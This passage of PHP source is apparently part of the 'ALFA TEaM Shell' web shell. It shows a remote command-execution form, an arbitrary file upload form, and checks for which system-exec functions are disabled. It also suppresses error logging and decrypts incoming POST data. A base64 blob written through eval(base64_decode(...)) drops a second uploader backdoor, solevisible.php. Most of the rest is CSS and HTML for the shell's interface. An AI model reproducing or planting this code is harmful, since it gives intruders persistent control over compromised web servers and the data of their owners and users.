646echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
647echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
648echo"<font color=#7CFC00>Disable functions : </font>";
649$disfun = @ini_get('disable_functions');
650if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
651echo"<font color=red>";
652echo "$disfun";
653echo"</font><br>";
654echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
655echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
656echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
657echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
658if(isset($_FILES['file'])){
659if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
660else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
661}
662echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
663<hr><pre>';
664if(isset($_POST['command_solevisible'])){
665if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
666$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
667echo alfaEx($solevisible);
668}
669echo'</pre>
670</body></html>';
671exit;}
672@error_reporting(E_ALL ^ E_NOTICE);
673@ini_set('error_log',NULL);
674@ini_set('log_errors',0);
675@ini_set('max_execution_time',0);
676@ini_set('magic_quotes_runtime', 0);
677@set_time_limit(0);
678if(function_exists('set_magic_quotes_runtime')){
679@set_magic_quotes_runtime(0);
680}
681foreach($_POST as $key => $value){
682if(is_array($_POST[$key])){
683$i=0;
684foreach($_POST[$key] as $f) {
685$f = trim(str_replace(' ', '+',$f));
686$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
687$i++;
688}
689}else{
690$value = trim(str_replace(' ', '+',$value));
691$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
692}
693}
694$default_action = 'FilesMan';
695$default_use_ajax = true;
696$default_charset = 'Windows-1251';
697if(strtolower(substr(PHP_OS,0,3))=="win")
698$GLOBALS['sys']='win';
699else
700$GLOBALS['sys']='unix';
701$GLOBALS['home_cwd'] = @getcwd();
702if($_POST["a"] != "GetPathHistory"){
703 if($_SESSION[__LAST_CWD__]!=$_POST['c']){
704 $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
705 }
706}
707$GLOBALS["need_to_update_header"] = "false";
708if(isset($_POST['c'])){
709if(!@chdir($_POST['c'])){
710 $GLOBALS['glob_chdir_false'] = true;
711}
712}
713$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
714if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
715if($GLOBALS['sys'] == 'win'){
716$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
717$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
718$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
719}
720if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
721function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
722function alfahead(){
723if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
724$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
725$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
726define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
727define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
728if(!isset($_POST['ajax'])){
729function Alfa_GetDisable_Function(){
730$disfun = @ini_get('disable_functions');
731$afa = '<span class="header_show_all">All Functions Accessible</span>';
732if(empty($disfun))return($afa);
733$s = explode(',',$disfun);
734$s = array_unique($s);
735$i=0;
736$b=0;
737$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
738$black_list = array();
739$allow_list = array();
740foreach($s as $d){
741 $d=trim($d);
742 if(empty($d)||!is_callable($d))continue;
743 if(!function_exists($d)){
744 if(in_array($d,$func)){
745 $dis .= $d." | ";$b++;
746 $black_list[] = $d;
747 }else{
748 $allow_list[] = $d;
749 }
750 $i++;
751 }
752}
753if($i==0)return($afa);
754if($i <= count($func)){
755$all = array_values(array_merge($black_list, $allow_list));
756return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
757}
758return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
759}
760function AlfaNum(){
761$args = func_get_args();
762$alfax = array();
763$find = array();
764for($i=1;$i<=10;$i++){
765$alfax[] = $i;
766}
767foreach($args as $arg){
768$find[] = $arg;
769}
770echo '<script>';
771foreach($alfax as $alfa){
772if(in_array($alfa,$find))
773continue;
774echo 'alfa'.$alfa."_=";
775}
776echo '""</script>';
777}
778if(empty($_POST['charset']))
779$_POST['charset'] = $GLOBALS['default_charset'];
780$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
781$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
782$totalSpace = $totalSpace?$totalSpace:1;
783$on="<span class='header_on'> ON </span>";
784$of="<span class='header_off'> OFF </span>";
785$none="<span class='header_none'> NONE </span>";
786if(function_exists('ssh2_connect'))
787$ssh2=$on;
788else
789$ssh2=$of;
790if(function_exists('curl_version'))
791$curl=$on;
792else
793$curl=$of;
794if(function_exists('mysql_get_client_info'))
795$mysql=$on;
796else
797$mysql=$of;
798if(function_exists('mssql_connect'))
799$mssql=$on;
800else
801$mssql=$of;
802if(function_exists('pg_connect'))
803$pg=$on;
804else
805$pg=$of;
806if(function_exists('oci_connect'))
807$or=$on;
808else
809$or=$of;
810if(@ini_get('disable_functions'))
811$disfun=@ini_get('disable_functions');
812else
813$disfun="All Functions Enable";
814if(@ini_get('safe_mode'))
815$safe_modes="<span class='header_off'>ON</span>";
816else
817$safe_modes="<span class='header_on'>OFF</span>";
818$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
819if(@ini_get('open_basedir')){
820$basedir_data = @ini_get('open_basedir');
821if(strlen($basedir_data)>120){
822$open_b=substr($basedir_data,0, 120)."...";
823}else{
824$open_b = $basedir_data;
825}
826}else{$open_b=$none;}
827if(@ini_get('safe_mode_exec_dir'))
828$safe_exe=@ini_get('safe_mode_exec_dir');
829else
830$safe_exe=$none;
831if(@ini_get('safe_mode_include_dir'))
832$safe_include=@ini_get('safe_mode_include_dir');
833else
834$safe_include=$none;
835if(!function_exists('posix_getegid'))
836{
837$user = function_exists("get_current_user")?@get_current_user():"????";
838$uid = function_exists("getmyuid")?@getmyuid():"????";
839$gid = function_exists("getmygid")?@getmygid():"????";
840$group = "?";
841}else{
842$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
843$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
844$user = $uid['name'];
845$uid = $uid['uid'];
846$group = $gid['name'];
847$gid = $gid['gid'];
848}
849$cwd_links = '';
850$path = explode("/", $GLOBALS['cwd']);
851$n=count($path);
852for($i=0; $i<$n-1; $i++) {
853$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
854for($j=0; $j<=$i; $j++)
855$cwd_links .= $path[$j].'/';
856$cwd_links .= "\")'>".$path[$i]."/</a>";
857}
858$drives = "";
859foreach(range('a','z') as $drive)
860if(@is_dir($drive.':\\'))
861$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
862$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
863echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
864<html xmlns="http://www.w3.org/1999/xhtml">
865<head>
866<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
867<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
868<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
869<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
870<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
871<style type="text/css">
872.hlabale {
873 color: #67ABDF;
874 border-radius: 4px;
875 border: 1px solid #27979B;
876 margin-left: 7px;
877 padding: 2px;
878}
879#tbl_sympphp tr {
880 text-align: center;
881}
882.editor-view {
883 position: relative;
884}
885.view-content {
886 position: absolute;
887 overflow-y: auto;
888 width: 100%;
889 height: 475px;
890}
891*::-webkit-scrollbar-track {
892 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
893 border-radius: 10px;
894 background-color: #000115;
895}
896*::-webkit-scrollbar{
897 width: 10px;
898 background-color: #000115;
899}
900*::-webkit-scrollbar-thumb {
901 border-radius: 10px;
902 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
903 background-color: rgb(30, 130, 181);
904}
905.editor-file-name {
906 margin-left: 29px;
907 margin-top: 4px;
908 overflow: hidden;
909 text-overflow: ellipsis;
910 white-space: nowrap;
911}
912.editor-icon {
913 position: absolute;
914}
915.is_active {
916 background: rgba(49, 55, 93, 0.77);
917 border-radius: 10px;
918}
919.history-list {
920 height: 88%;
921 overflow-y: auto;
922}
923#editor-minimized,#cgiloader-minimized {
924 display: block;
925 position: fixed;
926 right: -30px;
927 width: 30px;
928 height: 30px;
929 top: 30%;
930}
931.minimized-wrapper {
932 position: relative;
933 background: rgb(14, 48, 74);
934 width: 44px;
935 height: 167px;
936 cursor: pointer;
937 border-bottom-left-radius: 5px;
938 border-top-left-radius: 5px;
939}
940.minimized-text {
941 transform: rotate(-90deg);
942 color: wheat;
943 font-size: x-large;
944 display: inline-block;
945 position: absolute;
946 right: -51px;
947 width: 129px;
948 top: 50px;
949 border-top-left-radius: 4%;
950 height: 56px;
951 padding: 3px
952}
953.close-button,.editor-minimize {
954 height: 26px;
955 width: 38px;
956 right: 7px;
957 background: rgb(29, 86, 115);
958 cursor: pointer;
959 position: absolute;
960 box-sizing: border-box;
961 line-height: 50px;
962 display: inline-block;
963 top: 17px;
964 border-radius: 100px;
965}
966.editor-minimize {right: 50px;}
967.close-button:before,.close-button:after,.editor-minimize:before {
968 transform: rotate(-45deg);
969 content: "";
970 position: absolute;
971 top: 63%;
972 right: 6px;
973 margin-top: -5px;
974 margin-left: -25px;
975 display: block;
976 height: 4px;
977 width: 27px;
978 background-color: rgba(216, 207, 207, 0.75);
979 transition: all 0.25s ease-out;
980}
981.editor-minimize:before{
982 transform: rotate(0deg);
983}
984.close-button:after {
985 transform: rotate(-135deg);
986}
987.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
988 background-color: red;
989}
990.close-button:hover,.editor-minimize:hover{
991 background-color: rgba(39, 66, 80, 0.96);
992}
993#editor,#cgiloader {
994 display: none;
995 position: fixed;
996 top: 0;
997 width: 100%;
998 height: 100%;
999}
1000.editor-wrapper {
1001 width: 100%;
1002 height: 100%;
1003 position: relative;
1004 top: 1%;
1005}
1006.editor-header {
1007 width: 97%;
1008 background: rgba(21, 66, 88, 0.93);
1009 height: 37px;
1010 margin-left: 13px;
1011 position: relative;
1012 border-top-left-radius: 15px;
1013 border-top-right-radius: 15px;
1014}
1015.editor-path {
1016 position: absolute;
1017 font-size: x-large;
1018 margin-left: 10px;
1019 top: 6px;
1020 color: springgreen;
1021}
1022.editor-modal {
1023 position: relative;
1024 top: 0;
1025 background-color: rgba(0, 1, 23, 0.95);
1026 height: 90%;
1027 margin-left: 20%;
1028 margin-right: 2%;
1029 border: 2px #0e304a solid;
1030}
1031.editor-explorer {
1032 width: 19%;
1033 height: 90%;
1034 background-color: rgba(0, 1, 23, 0.94);
1035 position: absolute;
1036 z-index: 2;
1037 left: 1%;
1038 border: 2px rgb(14, 48, 74) solid;
1039}
1040.editor-controller {
1041 position: relative;
1042 top: -13px;
1043}
1044.file-holder {
1045 position: relative;
1046 width: 100%;
1047 height: 30px;
1048}
1049.file-holder > .history {
1050 position: absolute;
1051 color: rgb(3, 179, 163);
1052 cursor: pointer;
1053 left:5px;
1054 font-size: 18px;
1055 font-family: sans-serif;
1056 width:89%;
1057 height:100%;
1058 z-index: 3;
1059 border-radius: 10px;
1060 transition: background-color 600ms ease-out;
1061}
1062.file-holder > .history-close {
1063 display: block;
1064 opacity: 0;
1065 position: absolute;
1066 right: 2px;
1067 width: 20px;
1068 top: 4px;
1069 text-align: center;
1070 cursor: pointer;
1071 color: white;
1072 background: red;
1073 border-radius: 100px;
1074 font-family: monospace;
1075 z-index: 10;
1076 transition: opacity 600ms ease-out;
1077 font-size: 15px;
1078 height: 19px;
1079}
1080.file-holder > .history:hover {
1081 background-color: #646464;
1082}
1083.editor-explorer > .hheader {
1084 position: relative;
1085 color: rgb(20, 255, 7);
1086 border-bottom: 2px rgb(32, 106, 162) solid;
1087 text-align: center;
1088 font-family: sans-serif;
1089 margin-bottom: 10px;
1090 height: 55px;
1091}
1092.editor-search {
1093 position: absolute;
1094 bottom: 7px;
1095 left: 31px;
1096}
1097.hheader-text {
1098 position: absolute;
1099 left: 8px;
1100 top: 2px;
1101}
1102.history-clear {
1103 position: absolute;
1104 right: 8px;
1105 top: 2px;
1106 cursor: pointer;
1107}
1108.editor-body {
1109 position: relative;
1110 margin-left: 3px;
1111}
1112.editor-anim-close {
1113 '.showAnimation("editorClose").'
1114}
1115@keyframes editorClose {
1116 0% {
1117 transform: scale(1);
1118 opacity: 1;
1119 }
1120 100% {
1121 transform: scale(0);
1122 opacity: 0;
1123 }
1124}
1125.editor-anim-minimize {
1126 '.showAnimation("editorMinimize").'
1127}
1128@keyframes editorMinimize {
1129 0% {
1130 right:0px;
1131 opacity: 1;
1132 }
1133 100% {
1134 right: -2000px;
1135 opacity: 0;
1136 }
1137}
1138.editor-anim-show {
1139 '.showAnimation("editorShow").'
1140}
1141@keyframes editorShow {
1142 0% {
1143 right:-2000px;
1144 opacity: 0;
1145 }
1146 100% {
1147 right: 0px;
1148 opacity: 1;
1149 }
1150}
1151.minimized-show {
1152 '.showAnimation("minimizeShow").'
1153}
1154@keyframes minimizeShow {
1155 0% {
1156 right: -30px;
1157 opacity: 0;
1158 }
1159 100% {
1160 right: 0px;
1161 opacity: 1;
1162 }
1163}
1164.minimized-hide {
1165 '.showAnimation("minimizeHide").'
1166}
1167@keyframes minimizeHide {
1168 0% {
1169 right: 0px;
1170 opacity: 1;
1171 }
1172 100% {
1173 right: -30px;
1174 opacity: 0;
1175 }
1176}
1177.solevisible-text:hover {
1178 -webkit-text-shadow: 0px 0px 25px #00FF00;
1179 -moz-text-shadow: 0px 0px 25px #00FF00;
1180 -ms-text-shadow: 0px 0px 25px #00FF00;
1181 text-shadow: 0px 0px 25px #00FF00;
1182}
1183.update-holder {
1184 position: fixed;
1185 top: 0;
1186 background-color: rgba(0, 24, 29, 0.72);
1187 width: 100%;
1188 height: 100%;
1189}
1190.update-partner {
1191 width: 50%;
1192 position: relative;
1193 border-radius: 31px;
1194 height: 200px;
1195 background-color: rgba(3, 3, 41, 0.47);
1196 text-align: center;
1197 color: rgba(252, 253, 251, 0.88);
1198 margin-left: 25%;
1199 top: 23%;
1200 font-family: "Francois One", sans-serif;
1201}
1202.update-partner:hover {
1203-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1204-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1205box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
1206}
1207.update-content {
1208 position: relative;
1209}
1210.update-content > a {
1211 text-decoration: none;
1212 position: absolute;
1213 color: rgba(103, 167, 47, 0.77);
1214 left: 24%;
1215 margin-top: 7%;
1216 font-size: 40px;
1217 font-family: "Francois One", sans-serif;
1218}
1219.update-close {
1220 position: absolute;
1221 right: 0;
1222 margin-right: 23px;
1223 top: 10px;
1224 font-size: 27px;
1225 background-color: #130f50;
1226 width: 5%;
1227 border-radius: 100px;
1228 cursor: pointer;
1229 border: 2px rgb(14, 38, 90) solid;
1230}
1231.update-close:hover {
1232 border: 2px #25ff00 solid;
1233 color: #FF0000;
1234}
1235.filestools {
1236 height: auto;
1237 width: auto;
1238 color: #67ABDF;
1239 font-size: 12px;
1240 font-family: Verdana,Geneva,sans-serif;
1241}
1242@-moz-document url-prefix() {
1243 #search-input {
1244 width: 173px;
1245 }
1246 .editor-path {
1247 top:3px;
1248 }
1249}
1250@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1251@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1252@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1253@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1254#alfaloader{'.$csscode.'width:100px;height:100px;}
1255#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}
1256.ajaxarea{border:1px solid #0E304A;color:#67ABDF}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1257.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
1258.main th{text-align:left;}
1259.main a{color: #FFF;}
1260.main tr:hover{background-color:#646464;}
1261.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
1262.bigarea{ width:99%; height:300px; }
1263'.alfaCssLoadColors().'
1264</style>';
1265echo "<script type='text/javascript'>
1266var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
1267var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
1268var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
1269var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
1270var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
